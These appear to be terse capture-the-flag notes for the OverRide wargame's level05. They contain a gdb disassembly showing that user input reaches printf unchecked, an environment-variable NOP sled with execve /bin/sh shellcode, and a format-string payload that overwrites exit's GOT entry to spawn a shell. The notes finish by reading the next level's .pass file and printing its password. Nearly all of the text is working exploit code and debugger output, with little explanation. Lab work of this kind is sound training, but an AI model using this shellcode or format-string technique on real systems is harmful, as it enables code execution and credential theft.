(gdb) disass main
Dump of assembler code for function main:
   0x08048444 <+0>:	push   %ebp
   0x08048445 <+1>:	mov    %esp,%ebp
   0x08048447 <+3>:	push   %edi
   0x08048448 <+4>:	push   %ebx
   0x08048449 <+5>:	and    $0xfffffff0,%esp
   0x0804844c <+8>:	sub    $0x90,%esp
   0x08048452 <+14>:	movl   $0x0,0x8c(%esp)
   0x0804845d <+25>:	mov    0x80497f0,%eax
   0x08048462 <+30>:	mov    %eax,0x8(%esp)
   0x08048466 <+34>:	movl   $0x64,0x4(%esp)
   0x0804846e <+42>:	lea    0x28(%esp),%eax
   0x08048472 <+46>:	mov    %eax,(%esp)
   0x08048475 <+49>:	call   0x8048350 <fgets@plt>
   0x0804847a <+54>:	movl   $0x0,0x8c(%esp)
   0x08048485 <+65>:	jmp    0x80484d3 <main+143>
   0x08048487 <+67>:	lea    0x28(%esp),%eax
   0x0804848b <+71>:	add    0x8c(%esp),%eax
   0x08048492 <+78>:	movzbl (%eax),%eax
   0x08048495 <+81>:	cmp    $0x40,%al
   0x08048497 <+83>:	jle    0x80484cb <main+135>
   0x08048499 <+85>:	lea    0x28(%esp),%eax
   0x0804849d <+89>:	add    0x8c(%esp),%eax
   0x080484a4 <+96>:	movzbl (%eax),%eax
   0x080484a7 <+99>:	cmp    $0x5a,%al
   0x080484a9 <+101>:	jg     0x80484cb <main+135>
   0x080484ab <+103>:	lea    0x28(%esp),%eax
   0x080484af <+107>:	add    0x8c(%esp),%eax
   0x080484b6 <+114>:	movzbl (%eax),%eax
   0x080484b9 <+117>:	mov    %eax,%edx
   0x080484bb <+119>:	xor    $0x20,%edx
   0x080484be <+122>:	lea    0x28(%esp),%eax
   0x080484c2 <+126>:	add    0x8c(%esp),%eax
   0x080484c9 <+133>:	mov    %dl,(%eax)
   0x080484cb <+135>:	addl   $0x1,0x8c(%esp)
   0x080484d3 <+143>:	mov    0x8c(%esp),%ebx
   0x080484da <+150>:	lea    0x28(%esp),%eax
   0x080484de <+154>:	movl   $0xffffffff,0x1c(%esp)
   0x080484e6 <+162>:	mov    %eax,%edx
   0x080484e8 <+164>:	mov    $0x0,%eax
   0x080484ed <+169>:	mov    0x1c(%esp),%ecx
   0x080484f1 <+173>:	mov    %edx,%edi
   0x080484f3 <+175>:	repnz scas %es:(%edi),%al
   0x080484f5 <+177>:	mov    %ecx,%eax
   0x080484f7 <+179>:	not    %eax
   0x080484f9 <+181>:	sub    $0x1,%eax
   0x080484fc <+184>:	cmp    %eax,%ebx
   0x080484fe <+186>:	jb     0x8048487 <main+67>
   0x08048500 <+188>:	lea    0x28(%esp),%eax
   0x08048504 <+192>:	mov    %eax,(%esp)
   0x08048507 <+195>:	call   0x8048340 <printf@plt>
   0x0804850c <+200>:	movl   $0x0,(%esp)
   0x08048513 <+207>:	call   0x8048370 <exit@plt>
End of assembler dump.

offset 10

export SHELLCODE=$(python -c 'print "\x90" * 100 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"')

level05@OverRide:~$ objdump -R ./level05

./level05:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080497c4 R_386_GLOB_DAT    __gmon_start__
080497f0 R_386_COPY        stdin
080497d4 R_386_JUMP_SLOT   printf
080497d8 R_386_JUMP_SLOT   fgets
080497dc R_386_JUMP_SLOT   __gmon_start__
080497e0 R_386_JUMP_SLOT   exit
080497e4 R_386_JUMP_SLOT   __libc_start_main

(gdb) disass 0x080497e0
Dump of assembler code for function exit@got.plt:
   0x080497e0 <+0>:	jbe    0x8049765 <_DYNAMIC+105>
   0x080497e2 <+2>:	add    $0x8,%al
End of assembler dump.

(gdb) b *0x0804845d
Breakpoint 1 at 0x804845d
(gdb) r
Starting program: /home/users/level05/level05

Breakpoint 1, 0x0804845d in main ()
(gdb) x/50x *((char **)environ)
0xffffd890:	0x53	0x48	0x45	0x4c	0x4c	0x43	0x4f	0x44
0xffffd898:	0x45	0x3d	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8a0:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8a8:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8b0:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8b8:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8c0:	0x90	0x90
(gdb)
0xffffd8c2:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8ca:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd8d2:	0x90	0x90	0x90	0x6a	0x0b	0x58	0x99	0x52
0xffffd8da:	0x68	0x2f	0x2f	0x73	0x68	0x68	0x2f	0x62
0xffffd8e2:	0x69	0x6e	0x89	0xe3	0x31	0xc9	0xcd	0x80
0xffffd8ea:	0x00	0x53

0xffffd86c en decimal = 4294957232

(python -c 'print "\xe0\x97\x04\x08" + "\xe2\x97\x04\x08" + "%55399x" + "%10$n" + "%10128x" + "%11$n"'; cat) | ./level05


cat /home/users/level06/.pass
h4GtNnaMs2kZFN92ymTr2DcJHAzMfzLW25Ep59mq
